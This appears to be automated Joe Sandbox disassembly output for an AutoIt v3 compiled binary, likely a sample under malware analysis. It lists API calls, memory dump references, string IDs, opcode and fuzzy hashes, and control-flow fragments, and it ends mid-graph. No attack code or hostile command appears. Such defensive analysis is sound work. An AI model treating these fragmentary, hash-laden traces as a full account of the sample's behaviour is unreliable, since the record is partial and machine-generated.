                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00B9417B
                                              • Process32NextW.KERNEL32(00000000,?), ref: 00B9419B
                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00B94245
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 3243318325-0
                                              • Opcode ID: ad3825cafc3bc52acf4c48cebce01000d0b4e929f4f0a05a1f5077a0a929ab9c
                                              • Instruction ID: bc2ff10808f173ba1bd074c8efd7408b2a03858df6d19885a35c8daf3af1cf0c
                                              • Opcode Fuzzy Hash: ad3825cafc3bc52acf4c48cebce01000d0b4e929f4f0a05a1f5077a0a929ab9c
                                              • Instruction Fuzzy Hash: CF31BF715083419FC704EF54D885EAFBBE8FF99300F04096DF581C21A1EB709A89CB52
                                              APIs
                                                • Part of subcall function 00B43740: CharUpperBuffW.USER32(?,00BF71DC,00000000,?,00000000,00BF71DC,?,00B353A5,?,?,?,?), ref: 00B4375D
                                              • _memmove.LIBCMT ref: 00B3B68A
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: BuffCharUpper_memmove
                                              • String ID:
                                              • API String ID: 2819905725-0
                                              • Opcode ID: 1ede3852b11abb524b19751a82ad1514f07b654001edbbeff11896abe293d9de
                                              • Instruction ID: 9545db17398a98144b3c374c50df538e73f9111f8588dc1d40926ddd46027008
                                              • Opcode Fuzzy Hash: 1ede3852b11abb524b19751a82ad1514f07b654001edbbeff11896abe293d9de
                                              • Instruction Fuzzy Hash: 1FA267716087419FC720CF18C480B2AB7E1FF84704F2489ADE99A9B366DB71ED45CB92
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,00B7FC86), ref: 00B9495A
                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00B9496B
                                              • FindClose.KERNEL32(00000000), ref: 00B9497B
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: FileFind$AttributesCloseFirst
                                              • String ID:
                                              • API String ID: 48322524-0
                                              • Opcode ID: df65689413a1ca11c01ccbb3f22eab7f47e638e63b5ac0d6520244297f8d2770
                                              • Instruction ID: 487bb8f47682110f02d89acdaad6ad324a9459c3d40a5af91dc422d3b0dff574
                                              • Opcode Fuzzy Hash: df65689413a1ca11c01ccbb3f22eab7f47e638e63b5ac0d6520244297f8d2770
                                              • Instruction Fuzzy Hash: 22E0DF31820505EB86107B38EC4DCEAB7ACDE0A339F500765F835C21E0EB709D448696
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1ce52bceb8e81bbfcc3218a7ba463181520f8fc198b613711675e438871ed16a
                                              • Instruction ID: 94442ce9c1659f5495d02c56eaab7bf75564156f9336ea0271eb3d77f4414466
                                              • Opcode Fuzzy Hash: 1ce52bceb8e81bbfcc3218a7ba463181520f8fc198b613711675e438871ed16a
                                              • Instruction Fuzzy Hash: 17229E74A04205DFDB24DF58C480BAEB7F0FF59310F2485A9E85AAB391D7B0AD85CB91
                                              APIs
                                              • timeGetTime.WINMM ref: 00B3BF57
                                                • Part of subcall function 00B352B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B352E6
                                              • Sleep.KERNEL32(0000000A,?,?), ref: 00B736B5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessagePeekSleepTimetime
                                              • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                              • API String ID: 1792118007-922114024
                                              • Opcode ID: b69d38436d706c4e0d6ac2f83b3d97f18b4dbd180ee5ef56f7edfdbba03b28d8
                                              • Instruction ID: 7c120d160c8de072f3d05339c213f91021853da39721c38385fc3b9183bdc4fd
                                              • Opcode Fuzzy Hash: b69d38436d706c4e0d6ac2f83b3d97f18b4dbd180ee5ef56f7edfdbba03b28d8
                                              • Instruction Fuzzy Hash: BFC2B170608341DFD724DF24C884BAABBE4FF84704F24899DF59A972A1DB71E944DB42

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 00B33444
                                              • RegisterClassExW.USER32(00000030), ref: 00B3346E
                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B3347F
                                              • InitCommonControlsEx.COMCTL32(?), ref: 00B3349C
                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B334AC
                                              • LoadIconW.USER32(000000A9), ref: 00B334C2
                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B334D1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                              • API String ID: 2914291525-1005189915
                                              • Opcode ID: b0700c4ad65a5fee2cc299e996ef776f3c7c304cefa8044e46cd890cb71a0f2b
                                              • Instruction ID: 79a11a5f6ec81532aa32f325921c58396c27d8fbe7998c2f6a5ffec8ed84731f
                                              • Opcode Fuzzy Hash: b0700c4ad65a5fee2cc299e996ef776f3c7c304cefa8044e46cd890cb71a0f2b
                                              • Instruction Fuzzy Hash: FC3116B1994309EFDB50DFA8DC89BD9BBF0FB08310F10415AE590A72A0DBB51591CF90

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 00B33444
                                              • RegisterClassExW.USER32(00000030), ref: 00B3346E
                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B3347F
                                              • InitCommonControlsEx.COMCTL32(?), ref: 00B3349C
                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B334AC
                                              • LoadIconW.USER32(000000A9), ref: 00B334C2
                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B334D1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                              • API String ID: 2914291525-1005189915
                                              • Opcode ID: aef26436eb813be1016232a8b9ab1a9395d889139d137036e4735d9702fb3e1e
                                              • Instruction ID: 7886eab6f5c68a6e54cc842ec859db69d434a709894e81aae5106f6b9a4f9237
                                              • Opcode Fuzzy Hash: aef26436eb813be1016232a8b9ab1a9395d889139d137036e4735d9702fb3e1e
                                              • Instruction Fuzzy Hash: AD21E2B1954209EFDB00AFA9EC89BADBBF4FB08710F00415AF514A72A0DBB11540CF91

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00B500CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00B43094), ref: 00B500ED
                                                • Part of subcall function 00B508C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00B4309F), ref: 00B508E3
                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00B430E2
                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00B801BA
                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00B801FB
                                              • RegCloseKey.ADVAPI32(?), ref: 00B80239
                                              • _wcscat.LIBCMT ref: 00B80292
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                              • API String ID: 2673923337-2727554177
                                              • Opcode ID: af85b4b7de7188cbd2156d452912ffc338d7acd13a9db5c4841fb0b52181bdf3
                                              • Instruction ID: 0764cb55889a9ddb5726cab6506578b24435097fe24d7b2f229ecb33a393cb85
                                              • Opcode Fuzzy Hash: af85b4b7de7188cbd2156d452912ffc338d7acd13a9db5c4841fb0b52181bdf3
                                              • Instruction Fuzzy Hash: EB718E715153059EC704EF29EC81A6BBBE8FF89350F4009AEF545872B1EF70AA48DB52

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 00B45156
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00B45165
                                              • LoadIconW.USER32(00000063), ref: 00B4517C
                                              • LoadIconW.USER32(000000A4), ref: 00B4518E
                                              • LoadIconW.USER32(000000A2), ref: 00B451A0
                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B451C6
                                              • RegisterClassExW.USER32(?), ref: 00B4521C
                                                • Part of subcall function 00B33411: GetSysColorBrush.USER32(0000000F), ref: 00B33444
                                                • Part of subcall function 00B33411: RegisterClassExW.USER32(00000030), ref: 00B3346E
                                                • Part of subcall function 00B33411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B3347F
                                                • Part of subcall function 00B33411: InitCommonControlsEx.COMCTL32(?), ref: 00B3349C
                                                • Part of subcall function 00B33411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B334AC
                                                • Part of subcall function 00B33411: LoadIconW.USER32(000000A9), ref: 00B334C2
                                                • Part of subcall function 00B33411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B334D1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                              • String ID: #$0$AutoIt v3
                                              • API String ID: 423443420-4155596026
                                              • Opcode ID: 600e9c7f7cf5bd35bce256d05b0e30cc9ccf4669979507358aa2fcd8c84d822a
                                              • Instruction ID: 8c7dbb2691dae4e949b70b7afcccd7fc6c70eb6dd0e343eecff4fc9d21658d66
                                              • Opcode Fuzzy Hash: 600e9c7f7cf5bd35bce256d05b0e30cc9ccf4669979507358aa2fcd8c84d822a
                                              • Instruction Fuzzy Hash: CF212871994308EBEB109FA4ED09BAD7FF4EB09721F00019AF504A72A0DFB55A50DF84

                                              Control-flow Graph

                                              APIs
                                              • WSAStartup.WS2_32(00000101,?), ref: 00BA5E7E
                                              • inet_addr.WSOCK32(?,?,?), ref: 00BA5EC3
                                              • gethostbyname.WS2_32(?), ref: 00BA5ECF
                                              • IcmpCreateFile.IPHLPAPI ref: 00BA5EDD
                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00BA5F4D
                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00BA5F63
                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00BA5FD8
                                              • WSACleanup.WSOCK32 ref: 00BA5FDE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                              • String ID: Ping
                                              • API String ID: 1028309954-2246546115
                                              • Opcode ID: 3611300a7a3e1c906a32876c00405d179afd3677666c0d49a9ce0fd4d73a1167
                                              • Instruction ID: e9e5993bad63a8c54a7d60d15b2ecda1860fcf2441a42f07f7142f6a95e355f7
                                              • Opcode Fuzzy Hash: 3611300a7a3e1c906a32876c00405d179afd3677666c0d49a9ce0fd4d73a1167
                                              • Instruction Fuzzy Hash: 5F517E316086019FD721EF24DC89F2AB7E4EF49710F1449A9F995EB2A1DB71EE00DB42

                                              Control-flow Graph

                                              APIs
                                              • DefWindowProcW.USER32(?,?,?,?), ref: 00B44E22
                                              • KillTimer.USER32(?,00000001), ref: 00B44E4C
                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B44E6F
                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B44E7A
                                              • CreatePopupMenu.USER32 ref: 00B44E8E
                                              • PostQuitMessage.USER32(00000000), ref: 00B44EAF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                              • String ID: TaskbarCreated
                                              • API String ID: 129472671-2362178303
                                              • Opcode ID: 0ac199cc7cbb80c96883c8495a384d7d263af50392f34c072a7157b446d5bff5
                                              • Instruction ID: 79f4b2c039db2144df91c51ec037f3faf395c943855b402e8138573fd12bd415
                                              • Opcode Fuzzy Hash: 0ac199cc7cbb80c96883c8495a384d7d263af50392f34c072a7157b446d5bff5
                                              • Instruction Fuzzy Hash: 5341E6312D820AABEB297F68DC49B7A36D5F745301F0006E6F502932A2DF619E74F761

                                              Control-flow Graph

                                              APIs
                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00B80C5B
                                                • Part of subcall function 00B41821: _memmove.LIBCMT ref: 00B4185B
                                              • _memset.LIBCMT ref: 00B45787
                                              • _wcscpy.LIBCMT ref: 00B457DB
                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B457EB
                                              • __swprintf.LIBCMT ref: 00B80CD1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                              • String ID: Line %d: $AutoIt - $C$C$
                                              • API String ID: 230667853-2795402648
                                              • Opcode ID: 4400249ca0e8f96eb7f521fa9651c77b530225080c1fd59cdc24acba5d464fdc
                                              • Instruction ID: b6577fe43668b7f902549ac3400f081b237ec1e4c6082f41d2fbf0c31297850a
                                              • Opcode Fuzzy Hash: 4400249ca0e8f96eb7f521fa9651c77b530225080c1fd59cdc24acba5d464fdc
                                              • Instruction Fuzzy Hash: 7641A171408304AAC321FB64DC85BEB77ECAB44354F000AAAF185931A2DF70A789DB92

                                              Control-flow Graph

                                              control_flow_graph 1060 b450db-b4514b CreateWindowExW * 2 ShowWindow * 2
                                              APIs
                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B45109
                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B4512A
                                              • ShowWindow.USER32(00000000), ref: 00B4513E
                                              • ShowWindow.USER32(00000000), ref: 00B45147
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$CreateShow
                                              • String ID: AutoIt v3$edit
                                              • API String ID: 1584632944-3779509399
                                              • Opcode ID: ee1c0bae8ed6fe4d151df15f22ca93493f0238c8109b5c4b1a22b86e2af5857d
                                              • Instruction ID: 9c3419384aa73fc12e5f3d59d6405cd7877bf92e7132c0a16599e6623da38af5
                                              • Opcode Fuzzy Hash: ee1c0bae8ed6fe4d151df15f22ca93493f0238c8109b5c4b1a22b86e2af5857d
                                              • Instruction Fuzzy Hash: 01F0B771595294BAEA312B276C48E376E7DD7CBF50F00019EB904A31B0CE611851DAB0

                                              Control-flow Graph

                                              control_flow_graph 1061 b99b16-b99b9b call b44a8c call b99cf1 1066 b99b9d 1061->1066 1067 b99ba5-b99c31 call b44ab2 * 4 call b44a8c call b5593c * 2 call b44ab2 1061->1067 1069 b99b9f-b99ba0 1066->1069 1085 b99c36-b99c5c call b996c4 call b98f0e 1067->1085 1071 b99ce8-b99cee 1069->1071 1090 b99c5e-b99c6e call b52f85 * 2 1085->1090 1091 b99c73-b99c77 1085->1091 1090->1069 1093 b99c79-b99cd6 call b990c1 call b52f85 1091->1093 1094 b99cd8-b99cde call b52f85 1091->1094 1101 b99ce0-b99ce6 1093->1101 1094->1101 1101->1071
                                              APIs
                                                • Part of subcall function 00B44A8C: _fseek.LIBCMT ref: 00B44AA4
                                                • Part of subcall function 00B99CF1: _wcscmp.LIBCMT ref: 00B99DE1
                                                • Part of subcall function 00B99CF1: _wcscmp.LIBCMT ref: 00B99DF4
                                              • _free.LIBCMT ref: 00B99C5F
                                              • _free.LIBCMT ref: 00B99C66
                                              • _free.LIBCMT ref: 00B99CD1
                                                • Part of subcall function 00B52F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00B59C54,00000000,00B58D5D,00B559C3), ref: 00B52F99
                                                • Part of subcall function 00B52F85: GetLastError.KERNEL32(00000000,?,00B59C54,00000000,00B58D5D,00B559C3), ref: 00B52FAB
                                              • _free.LIBCMT ref: 00B99CD9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                              • String ID: >>>AUTOIT SCRIPT<<<
                                              • API String ID: 1552873950-2806939583
                                              • Opcode ID: af3f3d5893a89d2c5ef2c30c012aae9afa45173d51735985587d46273772c0e0
                                              • Instruction ID: 8bf2020e77c229dd28b717e1700645b4ec77a3519e2f35cfdf41d80b980b5cb2
                                              • Opcode Fuzzy Hash: af3f3d5893a89d2c5ef2c30c012aae9afa45173d51735985587d46273772c0e0
                                              • Instruction Fuzzy Hash: 0A5139B1904259ABDF249F64DC81BAEBBF9FF48304F1004EEB649A3241DB715A94CF58

                                              Control-flow Graph

                                              control_flow_graph 1105 b5563d-b55656 1106 b55673 1105->1106 1107 b55658-b5565d 1105->1107 1108 b55675-b5567b 1106->1108 1107->1106 1109 b5565f-b55661 1107->1109 1110 b55663-b55668 call b58d58 1109->1110 1111 b5567c-b55681 1109->1111 1121 b5566e call b58fe6 1110->1121 1113 b55683-b5568d 1111->1113 1114 b5568f-b55693 1111->1114 1113->1114 1116 b556b3-b556c2 1113->1116 1117 b55695-b556a0 call b53010 1114->1117 1118 b556a3-b556a5 1114->1118 1119 b556c4-b556c7 1116->1119 1120 b556c9 1116->1120 1117->1118 1118->1110 1123 b556a7-b556b1 1118->1123 1124 b556ce-b556d3 1119->1124 1120->1124 1121->1106 1123->1110 1123->1116 1127 b557bc-b557bf 1124->1127 1128 b556d9-b556e0 1124->1128 1127->1108 1129 b55721-b55723 1128->1129 1130 b556e2-b556ea 1128->1130 1132 b55725-b55727 1129->1132 1133 b5578d-b5578e call b60dd7 1129->1133 1130->1129 1131 b556ec 1130->1131 1134 b556f2-b556f4 1131->1134 1135 b557ea 1131->1135 1136 b55729-b55731 1132->1136 1137 b5574b-b55756 1132->1137 1146 b55793-b55797 1133->1146 1141 b556f6-b556f8 1134->1141 1142 b556fb-b55700 1134->1142 1143 b557ee-b557f7 1135->1143 1144 b55741-b55745 1136->1144 1145 b55733-b5573f 1136->1145 1139 b55758 1137->1139 1140 b5575a-b5575d 1137->1140 1139->1140 1149 b557c4-b557c8 1140->1149 1150 b5575f-b5576b call b54906 call b6108b 1140->1150 1141->1142 1142->1149 1151 b55706-b5571f call b60ef8 1142->1151 1143->1108 1147 b55747-b55749 1144->1147 1145->1147 1146->1143 1148 b55799-b5579e 1146->1148 1147->1140 1148->1149 1152 b557a0-b557b1 1148->1152 1153 b557da-b557e5 call b58d58 1149->1153 1154 b557ca-b557d7 call b53010 1149->1154 1166 b55770-b55775 1150->1166 1165 b55782-b5578b 1151->1165 1157 b557b4-b557b6 1152->1157 1153->1121 1154->1153 1157->1127 1157->1128 1165->1157 1167 b557fc-b55800 1166->1167 1168 b5577b-b5577e 